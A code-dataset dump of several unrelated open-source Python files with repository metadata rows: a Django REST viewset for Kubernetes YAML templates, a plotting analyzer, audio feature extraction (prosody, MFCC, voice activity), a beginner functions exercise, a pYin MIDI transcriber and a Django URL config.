from rest_framework.renderers import BrowsableAPIRenderer
from rest_framework.response import Response
from backend.components import paas_cc
from backend.iam.permissions.decorators import response_perms
from backend.iam.permissions.resources.namespace_scoped import NamespaceScopedPermCtx, NamespaceScopedPermission
from backend.iam.permissions.resources.templateset import (
TemplatesetAction,
TemplatesetCreatorAction,
TemplatesetPermission,
TemplatesetRequest,
)
from backend.utils.error_codes import error_codes
from backend.utils.renderers import BKAPIRenderer
from backend.utils.response import PermsResponse
from ..mixins import TemplatePermission
from ..models import get_template_by_project_and_id
from ..showversion.serializers import GetLatestShowVersionSLZ, GetShowVersionSLZ
from . import init_tpls, serializers
from .deployer import DeployController
from .release import ReleaseData, ReleaseDataProcessor
logger = logging.getLogger(__name__)
| 39.857778 | 125 | 0.674286 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
import logging
from rest_framework import viewsets
from rest_framework.renderers import BrowsableAPIRenderer
from rest_framework.response import Response
from backend.components import paas_cc
from backend.iam.permissions.decorators import response_perms
from backend.iam.permissions.resources.namespace_scoped import NamespaceScopedPermCtx, NamespaceScopedPermission
from backend.iam.permissions.resources.templateset import (
TemplatesetAction,
TemplatesetCreatorAction,
TemplatesetPermission,
TemplatesetRequest,
)
from backend.utils.error_codes import error_codes
from backend.utils.renderers import BKAPIRenderer
from backend.utils.response import PermsResponse
from ..mixins import TemplatePermission
from ..models import get_template_by_project_and_id
from ..showversion.serializers import GetLatestShowVersionSLZ, GetShowVersionSLZ
from . import init_tpls, serializers
from .deployer import DeployController
from .release import ReleaseData, ReleaseDataProcessor
logger = logging.getLogger(__name__)
class InitialTemplatesViewSet(viewsets.ViewSet):
renderer_classes = (BKAPIRenderer, BrowsableAPIRenderer)
def get_initial_templates(self, request, project_id):
return Response(init_tpls.get_initial_templates())
class YamlTemplateViewSet(viewsets.ViewSet, TemplatePermission):
renderer_classes = (BKAPIRenderer, BrowsableAPIRenderer)
def _request_data(self, request, **kwargs):
request_data = request.data.copy() or {}
logger.info(json.dumps(request_data))
request_data.update(**kwargs)
return request_data
def create_template(self, request, project_id):
"""
request.data = {
'name': '',
'desc': '',
'show_version': {
'name': '',
}
'template_files': [{
'resource_name': 'Deployment',
'files': [{'name': 'nginx.yaml', 'content': 'Kind:Deployment', 'action': 'create'}]
}]
}
"""
data = self._request_data(request, project_id=project_id)
serializer = serializers.CreateTemplateSLZ(data=data, context={"request": request})
serializer.is_valid(raise_exception=True)
template = serializer.save()
self.iam_perm.grant_resource_creator_actions(
TemplatesetCreatorAction(
template_id=template.id,
name=template.name,
project_id=template.project_id,
creator=request.user.username,
)
)
return Response({"template_id": template.id})
def update_template(self, request, project_id, template_id):
"""
request.data = {
'name': '',
'desc': '',
'updated_timestamp': 1595907256.0,
'show_version': {
'name': '',
'old_show_version_id': '',
}
'template_files': [{
'resource_name': 'Deployment',
'files': [{'name': 'nginx.yaml', 'content': 'Kind:Deployment', 'action': 'update', 'id': 3}]
}]
}
"""
template = get_template_by_project_and_id(project_id, template_id)
data = self._request_data(request, project_id=project_id)
serializer = serializers.UpdateTemplateSLZ(template, data=data, context={"request": request})
serializer.is_valid(raise_exception=True)
template = serializer.save()
return Response({"template_id": template.id})
def get_template_by_show_version(self, request, project_id, template_id, show_version_id):
serializer = GetShowVersionSLZ(data=self.kwargs)
serializer.is_valid(raise_exception=True)
validated_data = serializer.validated_data
template = validated_data["template"]
self.can_view_template(request, template)
with_file_content = request.query_params.get("with_file_content")
with_file_content = False if with_file_content == "false" else True
serializer = serializers.GetTemplateFilesSLZ(validated_data, context={"with_file_content": with_file_content})
return Response(serializer.data)
@response_perms(
action_ids=[TemplatesetAction.VIEW, TemplatesetAction.UPDATE, TemplatesetAction.INSTANTIATE],
permission_cls=TemplatesetPermission,
resource_id_key='id',
)
def get_template(self, request, project_id, template_id):
serializer = GetLatestShowVersionSLZ(data=self.kwargs)
serializer.is_valid(raise_exception=True)
validated_data = serializer.validated_data
template = validated_data["template"]
self.can_view_template(request, template)
serializer = serializers.GetTemplateFilesSLZ(validated_data, context={"with_file_content": True})
return PermsResponse(serializer.data, TemplatesetRequest(project_id=project_id))
class TemplateReleaseViewSet(viewsets.ViewSet, TemplatePermission):
renderer_classes = (BKAPIRenderer, BrowsableAPIRenderer)
def _request_data(self, request, **kwargs):
request_data = request.data.copy() or {}
request_data["show_version"] = kwargs
return request_data
# TODO use resources module function
def _get_namespace_info(self, access_token, project_id, namespace_id):
resp = paas_cc.get_namespace(access_token, project_id, namespace_id)
if resp.get("code") != 0:
raise error_codes.APIError(f"get namespace(id:{namespace_id}) info error: {resp.get('message')}")
return resp.get("data")
def _raw_release_data(self, project_id, initial_data):
show_version = initial_data["show_version"]
namespace_info = self._get_namespace_info(
self.request.user.token.access_token, project_id, initial_data["namespace_id"]
)
raw_release_data = ReleaseData(
project_id=project_id,
namespace_info=namespace_info,
show_version=show_version["show_version"],
template_files=initial_data["template_files"],
template_variables=initial_data["template_variables"],
)
return raw_release_data
def preview_or_apply(self, request, project_id, template_id, show_version_id):
"""
request.data = {
'is_preview': True,
'namespace_id': 'test',
'template_files': [{
'resource_name': 'Deployment',
'files': [{'name': 'nginx.yaml', 'id': 3}]
}],
'template_variables': {}
}
"""
data = self._request_data(
request, project_id=project_id, template_id=template_id, show_version_id=show_version_id
)
serializer = serializers.TemplateReleaseSLZ(data=data)
serializer.is_valid(raise_exception=True)
validated_data = serializer.validated_data
template = validated_data["show_version"]["template"]
self.can_use_template(request, template)
resp = paas_cc.get_namespace(request.user.token.access_token, project_id, validated_data["namespace_id"])
if resp.get('code') != 0:
return Response(
{
'code': 400,
'message': f"查询命名空间(namespace_id:{project_id}-{validated_data['namespace_id']})出错:{resp.get('message')}",
}
)
namespace_info = resp['data']
perm_ctx = NamespaceScopedPermCtx(
username=request.user.username,
project_id=project_id,
cluster_id=namespace_info['cluster_id'],
name=namespace_info['name'],
)
NamespaceScopedPermission().can_use(perm_ctx)
processor = ReleaseDataProcessor(
user=self.request.user, raw_release_data=self._raw_release_data(project_id, validated_data)
)
release_data = processor.release_data(is_preview=validated_data["is_preview"])
if validated_data["is_preview"]:
return Response(release_data.template_files)
controller = DeployController(user=self.request.user, release_data=release_data)
controller.apply()
return Response()
| 2,428 | 4,706 | 69 |
cea3ca7316f3a8d6ec3256b07e5e310104ec5ec4 | 2,581 | py | Python | analyses/TestAnalyzer.py | ThinkNaive/Matrix-Vector-Multiplication | 9a00ba9e4d0d298ce4ff3bfae092f49571a56605 | [
"MIT"
] | null | null | null | analyses/TestAnalyzer.py | ThinkNaive/Matrix-Vector-Multiplication | 9a00ba9e4d0d298ce4ff3bfae092f49571a56605 | [
"MIT"
] | null | null | null | analyses/TestAnalyzer.py | ThinkNaive/Matrix-Vector-Multiplication | 9a00ba9e4d0d298ce4ff3bfae092f49571a56605 | [
"MIT"
] | null | null | null | # coding=utf-8
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
# 由master生成的测试参数
row = 10000
col = 10000
iteration = 10
param = {'id': '3', 'strategy': 'lt', 'p': 10, 'c': 0.03, 'delta': 0.5, 'alpha': 2.0}
params = [{'key': 'client-a'},
{'key': 'client-b'},
{'key': 'client-c'},
{'key': 'client-d'},
{'key': 'client-e'},
{'key': 'client-f'},
{'key': 'client-g'},
{'key': 'client-h'},
{'key': 'client-i'},
{'key': 'client-j'}]
keys = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Key' + '.npy', allow_pickle=True)
times = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Time' + '.npy')
comps = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Comp' + '.npy')
stops = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Stop' + '.npy')
ideals = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Ideal' + '.npy')
color = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
marker = ['o', '^', 's', 'D', 'x', '*', '+']
slave = [e['key'] for e in params]
for key, time, comp, stop, ideal in zip(keys, times, comps, stops, ideals): # 单个循环
group = {}
for i, s in enumerate(slave):
group[s] = {}
group[s]['time'] = time[i]
group[s]['comp'] = comp[i]
if key.__contains__(s):
group[s]['valid'] = True
else:
group[s]['valid'] = False
print('--- iteration ---')
print(group)
# # 计算节点总次数
# fig = plt.figure(num=1, figsize=(6, 4), dpi=150)
# plt.title('Computation vs Latency')
# plt.xlabel('latency (s)')
# plt.ylabel('computation/$m$ (ratio)')
#
# plt.plot(latency[0:2], computation[0:2], color=color[0], label=params[0]['strategy'].upper(), marker=marker[0])
# plt.plot(latency[2:6], computation[2:6], color=color[1], label=params[2]['strategy'].upper(), marker=marker[1])
# plt.plot(latency[6:12], computation[6:12], color=color[2], label=params[6]['strategy'].upper(), marker=marker[2])
#
# for i, (x, y) in enumerate(zip(latency[0:2], computation[0:2])):
# plt.annotate(r'$r$=%s' % params[i]['repNum'], xy=(x, y), xytext=(0, 5), textcoords='offset points')
#
# plt.legend(loc='upper left')
# plt.savefig('figures/Param_ComputationVsLatency.svg', dpi=150, bbox_inches='tight')
# plt.show()
| 40.968254 | 119 | 0.515304 | # coding=utf-8
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
# 由master生成的测试参数
row = 10000
col = 10000
iteration = 10
param = {'id': '3', 'strategy': 'lt', 'p': 10, 'c': 0.03, 'delta': 0.5, 'alpha': 2.0}
params = [{'key': 'client-a'},
{'key': 'client-b'},
{'key': 'client-c'},
{'key': 'client-d'},
{'key': 'client-e'},
{'key': 'client-f'},
{'key': 'client-g'},
{'key': 'client-h'},
{'key': 'client-i'},
{'key': 'client-j'}]
keys = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Key' + '.npy', allow_pickle=True)
times = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Time' + '.npy')
comps = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Comp' + '.npy')
stops = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Stop' + '.npy')
ideals = np.load('statistics/Test_' + param['strategy'] + '_' + param['id'] + '_Ideal' + '.npy')
color = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
marker = ['o', '^', 's', 'D', 'x', '*', '+']
slave = [e['key'] for e in params]
for key, time, comp, stop, ideal in zip(keys, times, comps, stops, ideals): # 单个循环
group = {}
for i, s in enumerate(slave):
group[s] = {}
group[s]['time'] = time[i]
group[s]['comp'] = comp[i]
if key.__contains__(s):
group[s]['valid'] = True
else:
group[s]['valid'] = False
print('--- iteration ---')
print(group)
# # 计算节点总次数
# fig = plt.figure(num=1, figsize=(6, 4), dpi=150)
# plt.title('Computation vs Latency')
# plt.xlabel('latency (s)')
# plt.ylabel('computation/$m$ (ratio)')
#
# plt.plot(latency[0:2], computation[0:2], color=color[0], label=params[0]['strategy'].upper(), marker=marker[0])
# plt.plot(latency[2:6], computation[2:6], color=color[1], label=params[2]['strategy'].upper(), marker=marker[1])
# plt.plot(latency[6:12], computation[6:12], color=color[2], label=params[6]['strategy'].upper(), marker=marker[2])
#
# for i, (x, y) in enumerate(zip(latency[0:2], computation[0:2])):
# plt.annotate(r'$r$=%s' % params[i]['repNum'], xy=(x, y), xytext=(0, 5), textcoords='offset points')
#
# plt.legend(loc='upper left')
# plt.savefig('figures/Param_ComputationVsLatency.svg', dpi=150, bbox_inches='tight')
# plt.show()
| 0 | 0 | 0 |
b25c3ee2eacc5ec3f4d8e4d31557ea457f8037a6 | 8,096 | py | Python | code/feature_extraction/audio_utils.py | jonepatr/lets_face_it | fefba5e82d236f89703449bd517cfa5867fda09f | [
"MIT"
] | 11 | 2020-10-21T09:58:53.000Z | 2022-01-22T08:31:57.000Z | code/feature_extraction/audio_utils.py | jonepatr/lets_face_it | fefba5e82d236f89703449bd517cfa5867fda09f | [
"MIT"
] | 3 | 2021-05-05T07:15:45.000Z | 2021-12-14T14:43:42.000Z | code/feature_extraction/audio_utils.py | jonepatr/lets_face_it | fefba5e82d236f89703449bd517cfa5867fda09f | [
"MIT"
] | 4 | 2020-10-21T09:46:22.000Z | 2021-12-16T11:41:03.000Z | import shutil
import tempfile
from pathlib import Path
import librosa
import numpy as np
import parselmouth as pm
import scipy.io.wavfile as wav
import scipy.signal as sig
import soundfile
from misc.shared import DATA_DIR, DATASET_DIR
from pydub import AudioSegment
from python_speech_features import mfcc
from scipy.signal._savitzky_golay import savgol_filter
from tqdm import tqdm
from feature_extraction.shared import count_video_frames
def derivative(x, f):
""" Calculate numerical derivative (by FDM) of a 1d array
Args:
x: input space x
f: Function of x
Returns:
der: numerical derivative of f wrt x
"""
x = 1000 * x # from seconds to milliseconds
# Normalization:
dx = x[1] - x[0]
cf = np.convolve(f, [1, -1]) / dx
# Remove unstable values
der = cf[:-1].copy()
der[0] = 0
return der
def extract_prosodic_features(audio_filename, nb_frames, time_step=0.02):
"""
Extract all 4 prosodic features
Args:
audio_filename: file name for the audio to be used
Returns:
pros_feature: energy, energy_der, pitch, pitch_der, pitch_ind
"""
# Read audio from file
sound = AudioSegment.from_file(audio_filename, format="wav")
# Alternative prosodic features
pitch, energy = compute_prosody(audio_filename, time_step)
duration = len(sound) / 1000
t = np.arange(0, duration, time_step)
energy_der = derivative(t, energy)
pitch_der = derivative(t, pitch)
# Stack them all together
pros_feature = np.stack((energy, energy_der, pitch, pitch_der))
# And reshape
pros_feature = np.transpose(pros_feature)
return sig.resample(pros_feature, nb_frames)
def crosstalk_vad(
speaker1_path,
speaker2_path,
frame_count,
tha=30,
thb=5,
savgol_win=301,
savgol_poly_order=1,
):
"""
tha: absolute dB level for when to consider there to be speech activity in a channel
thb: minimum difference between channels to consider it to be one speaker only
"""
fs, x1 = wav.read(speaker1_path)
_, x2 = wav.read(speaker2_path)
x1 = x1.astype("float")
x2 = x2.astype("float")
# calculate rms energy in dB at a rate of 100 Hz (hop length 0.01 s)
e1 = librosa.core.amplitude_to_db(
librosa.feature.rms(x1, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
).flatten()
e2 = librosa.core.amplitude_to_db(
librosa.feature.rms(x2, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
).flatten()
# boolean vectors at 100 Hz, s1: only speaker 1. s2: only speaker 2.
s1 = np.logical_and(np.greater(e1, tha), np.greater(e1, e2 + thb))
s2 = np.logical_and(np.greater(e2, tha), np.greater(e2, e1 + thb))
smooth_s1 = savgol_filter(s1, savgol_win, savgol_poly_order,)
smooth_s2 = savgol_filter(s2, savgol_win, savgol_poly_order,)
s1x = np.clip(sig.resample(smooth_s1, frame_count, window="hamming"), 0, 1)
s2x = np.clip(sig.resample(smooth_s2, frame_count, window="hamming"), 0, 1)
s1x[s1x >= 0.1] = 1
s2x[s2x >= 0.1] = 1
s1x[s1x < 0.1] = 0
s2x[s2x < 0.1] = 0
return s1x, s2x
| 29.985185 | 88 | 0.644392 | import shutil
import tempfile
from pathlib import Path
import librosa
import numpy as np
import parselmouth as pm
import scipy.io.wavfile as wav
import scipy.signal as sig
import soundfile
from misc.shared import DATA_DIR, DATASET_DIR
from pydub import AudioSegment
from python_speech_features import mfcc
from scipy.signal._savitzky_golay import savgol_filter
from tqdm import tqdm
from feature_extraction.shared import count_video_frames
def compute_prosody(audio_filename, time_step=0.05):
audio = pm.Sound(audio_filename)
# Extract pitch and intensity
pitch = audio.to_pitch(time_step=time_step)
intensity = audio.to_intensity(time_step=time_step)
# Evenly spaced time steps
times = np.arange(0, audio.get_total_duration() - time_step, time_step)
# Compute prosodic features at each time step
pitch_values = np.nan_to_num(
np.asarray([pitch.get_value_at_time(t) for t in times])
)
intensity_values = np.nan_to_num(
np.asarray([intensity.get_value(t) for t in times])
)
intensity_values = np.clip(
intensity_values, np.finfo(intensity_values.dtype).eps, None
)
# Normalize features [Chiu '11]
pitch_norm = np.clip(np.log(pitch_values + 1) - 4, 0, None)
intensity_norm = np.clip(np.log(intensity_values) - 3, 0, None)
return pitch_norm, intensity_norm
def derivative(x, f):
""" Calculate numerical derivative (by FDM) of a 1d array
Args:
x: input space x
f: Function of x
Returns:
der: numerical derivative of f wrt x
"""
x = 1000 * x # from seconds to milliseconds
# Normalization:
dx = x[1] - x[0]
cf = np.convolve(f, [1, -1]) / dx
# Remove unstable values
der = cf[:-1].copy()
der[0] = 0
return der
def extract_prosodic_features(audio_filename, nb_frames, time_step=0.02):
"""
Extract all 4 prosodic features
Args:
audio_filename: file name for the audio to be used
Returns:
pros_feature: energy, energy_der, pitch, pitch_der, pitch_ind
"""
# Read audio from file
sound = AudioSegment.from_file(audio_filename, format="wav")
# Alternative prosodic features
pitch, energy = compute_prosody(audio_filename, time_step)
duration = len(sound) / 1000
t = np.arange(0, duration, time_step)
energy_der = derivative(t, energy)
pitch_der = derivative(t, pitch)
# Stack them all together
pros_feature = np.stack((energy, energy_der, pitch, pitch_der))
# And reshape
pros_feature = np.transpose(pros_feature)
return sig.resample(pros_feature, nb_frames)
def split_audio_channels():
files = list(DATA_DIR.glob("Sessions/*/*c1_c2.wav"))
for file in tqdm(files, desc="Splitting audio files"):
session = file.parent.name
data = None
for i, participant in enumerate(("P1", "P2")):
wav_file = DATASET_DIR / session / participant / "audio.wav"
if wav_file.exists():
continue
if data is None:
data, fs = soundfile.read(file)
with tempfile.TemporaryDirectory() as tmpd:
tmpf = Path(tmpd) / "audio.wav"
soundfile.write(tmpf, data[:, i], fs, "PCM_16")
wav_file.parent.mkdir(parents=True, exist_ok=True)
shutil.move(tmpf, wav_file)
def chunk_audio():
files = list(DATASET_DIR.glob("*/*/audio.wav"))
for file in tqdm(files, desc="Chunking audio"):
audio_chunk_dir = file.parent / "audio_chunks"
if audio_chunk_dir.exists():
continue
y, fs = librosa.load(file, librosa.get_samplerate(file))
segments = librosa.effects.split(y, top_db=3)
prev_seg_start = 0
tmpd = Path(tempfile.mkdtemp())
for i, segment in enumerate(segments, 1):
data = y[prev_seg_start : segment[0]]
soundfile.write(tmpd / f"{i:05}.wav", data, fs, "PCM_16")
prev_seg_start = segment[0]
soundfile.write(tmpd / f"{i+1:05}.wav", y[prev_seg_start:], fs, "PCM_16")
shutil.move(tmpd, audio_chunk_dir)
def crosstalk_vad(
speaker1_path,
speaker2_path,
frame_count,
tha=30,
thb=5,
savgol_win=301,
savgol_poly_order=1,
):
"""
tha: absolute dB level for when to consider there to be speech activity in a channel
thb: minimum difference between channels to consider it to be one speaker only
"""
fs, x1 = wav.read(speaker1_path)
_, x2 = wav.read(speaker2_path)
x1 = x1.astype("float")
x2 = x2.astype("float")
# calculate rms energy in dB at a rate of 100 Hz (hop length 0.01 s)
e1 = librosa.core.amplitude_to_db(
librosa.feature.rms(x1, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
).flatten()
e2 = librosa.core.amplitude_to_db(
librosa.feature.rms(x2, frame_length=int(fs * 0.02), hop_length=int(fs * 0.01))
).flatten()
# boolean vectors at 100 Hz, s1: only speaker 1. s2: only speaker 2.
s1 = np.logical_and(np.greater(e1, tha), np.greater(e1, e2 + thb))
s2 = np.logical_and(np.greater(e2, tha), np.greater(e2, e1 + thb))
smooth_s1 = savgol_filter(s1, savgol_win, savgol_poly_order,)
smooth_s2 = savgol_filter(s2, savgol_win, savgol_poly_order,)
s1x = np.clip(sig.resample(smooth_s1, frame_count, window="hamming"), 0, 1)
s2x = np.clip(sig.resample(smooth_s2, frame_count, window="hamming"), 0, 1)
s1x[s1x >= 0.1] = 1
s2x[s2x >= 0.1] = 1
s1x[s1x < 0.1] = 0
s2x[s2x < 0.1] = 0
return s1x, s2x
def extract_prosody(fps):
files = list(DATASET_DIR.glob("*/*/audio.wav"))
for file in tqdm(files, desc="Extracting prosodic features"):
prosody_file = file.parent / f"prosodic_features_{fps}fps.npy"
video_file = file.parent / f"video_{fps}fps.mp4"
if prosody_file.exists() or not video_file.exists():
continue
nb_frames = count_video_frames(video_file)
# Calculate prosodic features
prosodic_featuers = extract_prosodic_features(str(file), nb_frames)
np.save(prosody_file, prosodic_featuers)
def extract_mfcc(fps, num_cep=26, window_length=0.02, window_step=0.01, nfft=1024):
files = list(DATASET_DIR.glob("*/*/audio.wav"))
for file in tqdm(files, desc="Extracting mfccs"):
mfcc_file = file.parent / f"mfcc_{fps}fps.npy"
video_file = file.parent / f"video_{fps}fps.mp4"
if mfcc_file.exists() or not video_file.exists():
continue
nb_frames = count_video_frames(video_file)
# Calculate MFCC feature with the window frame it was designed for
fs, audio = wav.read(file)
mfcc_features = mfcc(
audio,
winlen=window_length,
winstep=window_step,
samplerate=fs,
numcep=num_cep,
nfft=nfft,
)
# Resample to desired frame length
resampled_mfccs = sig.resample(mfcc_features, nb_frames)
np.save(mfcc_file, resampled_mfccs)
def extract_vad(fps):
sessions = list(DATASET_DIR.glob("*"))
for session in tqdm(sessions, desc="Extracting crosstalk vad"):
p1_wav = session / "P1" / "audio.wav"
p2_wav = session / "P2" / "audio.wav"
p1_vad_file = session / "P1" / f"crosstalk_vad_{fps}fps.npy"
p2_vad_file = session / "P2" / f"crosstalk_vad_{fps}fps.npy"
p1_video_file = session / "P1" / f"video_{fps}fps.mp4"
p2_video_file = session / "P2" / f"video_{fps}fps.mp4"
if p1_vad_file.exists() or p2_vad_file.exists():
continue
if not p1_video_file.exists() or not p2_video_file.exists():
continue
p1_nb_frames = count_video_frames(p1_video_file)
p2_nb_frames = count_video_frames(p2_video_file)
assert p1_nb_frames == p2_nb_frames
p1, p2 = crosstalk_vad(p1_wav, p2_wav, p1_nb_frames)
np.save(p1_vad_file, p1)
try:
np.save(p2_vad_file, p2)
except:
p1_vad_file.unlink()
| 4,779 | 0 | 138 |
deeb4aa4c9389421b410b823b599dee2b492e6f4 | 916 | py | Python | MyWork/OldFiles/Beginner/FunctionsWithOutput.py/FunctionsWithOutputs.py | minefarmer/100-Days-Python | b80b28d299342b490082ac301a0d8b176419f8f9 | [
"Unlicense"
] | null | null | null | MyWork/OldFiles/Beginner/FunctionsWithOutput.py/FunctionsWithOutputs.py | minefarmer/100-Days-Python | b80b28d299342b490082ac301a0d8b176419f8f9 | [
"Unlicense"
] | null | null | null | MyWork/OldFiles/Beginner/FunctionsWithOutput.py/FunctionsWithOutputs.py | minefarmer/100-Days-Python | b80b28d299342b490082ac301a0d8b176419f8f9 | [
"Unlicense"
] | null | null | null | ''' Functions with output
def my_function(something):
#Do this with something
#Then do this
#finally do this
def my_function():
return 3 * 2 # result
'''
# def format_name(f_name, l_name):
# print(f_name.title())
# print(l_name.title())
# format_name("rich", "MATSON") # Rich
# Matson
# def format_name(f_name, l_name):
# formated_f_name = f_name.title()
# formated_l_name = l_name.title()
# print(f"{formated_f_name} {formated_l_name}") # Richard Matson
# format_name("RichARD", "MATSON")
# formated_string = format_name("RichARD", "MATSON")
# print(formated_string) # Richard Matson
print(format_name("RicHARD", "MATSON")) # Richard Matson
output = len("Richard")
| 21.302326 | 69 | 0.651747 | ''' Functions with output
def my_function(something):
#Do this with something
#Then do this
#finally do this
def my_function():
return 3 * 2 # result
'''
# def format_name(f_name, l_name):
# print(f_name.title())
# print(l_name.title())
# format_name("rich", "MATSON") # Rich
# Matson
# def format_name(f_name, l_name):
# formated_f_name = f_name.title()
# formated_l_name = l_name.title()
# print(f"{formated_f_name} {formated_l_name}") # Richard Matson
# format_name("RichARD", "MATSON")
def format_name(f_name, l_name):
formated_f_name = f_name.title()
formated_l_name = l_name.title()
return f"{formated_f_name} {formated_l_name}"
# formated_string = format_name("RichARD", "MATSON")
# print(formated_string) # Richard Matson
print(format_name("RicHARD", "MATSON")) # Richard Matson
output = len("Richard")
| 136 | 0 | 23 |
b701bc49a8f78c1f99f8cb01373047a279aef075 | 887 | py | Python | clonehero_scoreboard_app/csv_handler.py | apesch85/clonehero_scoreboard | 2b8550a9db93e46d1104ec5e1ed92a7282bc567c | [
"MIT"
] | null | null | null | clonehero_scoreboard_app/csv_handler.py | apesch85/clonehero_scoreboard | 2b8550a9db93e46d1104ec5e1ed92a7282bc567c | [
"MIT"
] | null | null | null | clonehero_scoreboard_app/csv_handler.py | apesch85/clonehero_scoreboard | 2b8550a9db93e46d1104ec5e1ed92a7282bc567c | [
"MIT"
] | null | null | null | import csv
import os
from score_comparer import ScoreComparer
| 34.115385 | 77 | 0.685457 | import csv
import os
from score_comparer import ScoreComparer
def HandleCsv(csv_path, final_score_dict):
csv_exists = os.path.isfile(csv_path)
if csv_exists:
with open(csv_path, 'r') as read_scores:
csv_reader = csv.reader(read_scores)
existing_scores = list(csv_reader)
compared_scores = ScoreComparer(final_score_dict, existing_scores, 'csv')
final_score_dict = compared_scores
if final_score_dict:
with open(csv_path, 'w') as writer:
csvwriter = csv.writer(writer)
for score_details in final_score_dict.values():
title = score_details[0]
score = score_details[1]
stars = score_details[2]
difficulty = score_details[3]
accuracy = score_details[4]
score_date = score_details[5]
csvwriter.writerow([title, score, difficulty, stars,
accuracy, score_date])
| 802 | 0 | 23 |
1d5caf304ff7c630a8244058d57493b0771b5dfa | 1,987 | py | Python | annotation_process/onset.py | marl/GuitarSet | 462f414a3a5fed6477ee1c589acd776ef3262b41 | [
"MIT"
] | 81 | 2018-05-04T19:53:45.000Z | 2022-01-27T15:17:42.000Z | annotation_process/onset.py | funkfuzz/GuitarSet | 462f414a3a5fed6477ee1c589acd776ef3262b41 | [
"MIT"
] | 4 | 2019-03-12T19:50:44.000Z | 2020-05-15T13:38:56.000Z | annotation_process/onset.py | funkfuzz/GuitarSet | 462f414a3a5fed6477ee1c589acd776ef3262b41 | [
"MIT"
] | 12 | 2018-05-04T19:54:08.000Z | 2022-01-19T17:37:52.000Z | import vamp
import librosa
import numpy as np
import pretty_midi
import jams
import os
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='analyze whole stems.')
parser.add_argument(
'inpath', type=str, help='path to the stem of interest')
parser.add_argument(
'outpath', type=str, help='path to the stem of interest')
rough_midi(parser.parse_args())
| 30.569231 | 97 | 0.621037 | import vamp
import librosa
import numpy as np
import pretty_midi
import jams
import os
import argparse
def rough_midi(args):
# gets a rough midi trasncription using pYin Note from inpath.wav to outpath.mid
if os.path.exists(args.outpath):
print('file already exist')
return 0
#check if outpath exist, return 0.
y, fs = librosa.load(args.inpath, sr=None)
# tempo = int(args.inpath.split('_')[1].split('-')[1])
print('finished loading')
param = {"threshdistr": 2,
"lowampsuppression": 0.08,
"outputunvoiced": 2,
"precisetime": 0,
"prunethresh": 0.05,
"onsetsensitivity": 0.8}
pyin_note_output = vamp.collect(y, fs, 'pyin:pyin', output='notes', parameters=param)['list']
print('finished pYin')
midi = build_midi_from_output(pyin_note_output)
midi.write(args.outpath)
return 0
def build_midi_from_output(pyin_note_output):
midi = pretty_midi.PrettyMIDI('tempo_template.mid')
ch = pretty_midi.Instrument(program=25)
for note in pyin_note_output:
pitch = int(round(librosa.hz_to_midi(note['values'])[0]))
st = float(note['timestamp'])
dur = float(note['duration'])
# print(pitch, st, dur )
n = pretty_midi.Note(
velocity=100,
pitch=pitch, start=st,
end=st+dur
)
ch.notes.append(n)
# bend_amount = int(round((note.value - pitch) * 4096))
# pb = pretty_midi.PitchBend(pitch=bend_amount*q, time=st)
# ch.pitch_bends.append(pb)
midi.instruments.append(ch)
return midi
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='analyze whole stems.')
parser.add_argument(
'inpath', type=str, help='path to the stem of interest')
parser.add_argument(
'outpath', type=str, help='path to the stem of interest')
rough_midi(parser.parse_args())
| 1,501 | 0 | 46 |
2247560231332cd3b4dc8cbf8ea9235b791cb557 | 403 | py | Python | uopbmoh_hub/urls.py | westerncapelabs/uopboh-hub | 10c36026e5588d1490dfa3396745db5b9a94e875 | [
"BSD-3-Clause"
] | null | null | null | uopbmoh_hub/urls.py | westerncapelabs/uopboh-hub | 10c36026e5588d1490dfa3396745db5b9a94e875 | [
"BSD-3-Clause"
] | 2 | 2016-01-18T16:23:53.000Z | 2016-02-22T08:50:56.000Z | uopbmoh_hub/urls.py | westerncapelabs/uopboh-hub | 10c36026e5588d1490dfa3396745db5b9a94e875 | [
"BSD-3-Clause"
] | null | null | null | import os
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
admin.site.site_header = os.environ.get('UOPBMOH_HUB_TITLE', 'UoPBMoH Admin')
urlpatterns = patterns(
'',
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('hub.urls')),
)
urlpatterns += staticfiles_urlpatterns()
| 26.866667 | 77 | 0.744417 | import os
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
admin.site.site_header = os.environ.get('UOPBMOH_HUB_TITLE', 'UoPBMoH Admin')
urlpatterns = patterns(
'',
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('hub.urls')),
)
urlpatterns += staticfiles_urlpatterns()
| 0 | 0 | 0 |
90623213d36080058235d77137f677569c026eb7 | 1,397 | py | Python | rummikub/predict.py | ronikobrosly/rummikub_AI | 4cce795d8cd6c54270d12ae14a7b2b6afa53ca2f | [
"MIT"
] | null | null | null | rummikub/predict.py | ronikobrosly/rummikub_AI | 4cce795d8cd6c54270d12ae14a7b2b6afa53ca2f | [
